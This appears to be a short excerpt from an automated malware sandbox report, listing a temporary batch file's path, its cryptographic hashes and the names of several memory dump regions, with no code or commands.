C:\Users\Admin\AppData\Local\Temp\76DA.tmp\76DB.tmp\76DC.bat

MD5 8760b15c6d12ecc70594fc8db876c68c
SHA1 b1d47a27bf45db9955f07c773a5a334e3b528a97
SHA256 9a3d9f84626d1443b0e1fc1afe22cc4045c20714b98838e94542991039cf8463
SHA512 0463204ebabf6465ba3be44b31dc235ba240f1899b41336655a3f361932b8225326d8ab7c53130d4ded9412193d5967f805221212b964d6a54492d0f2c331dee

memory/4912-130-0x0000000000000000-mapping.dmp

memory/2952-175-0x0000000004A00000-0x0000000004A66000-memory.dmp

memory/2952-176-0x0000000005630000-0x0000000005BD4000-memory.dmp

memory/2952-177-0x0000000005F00000-0x0000000005F92000-memory.dmp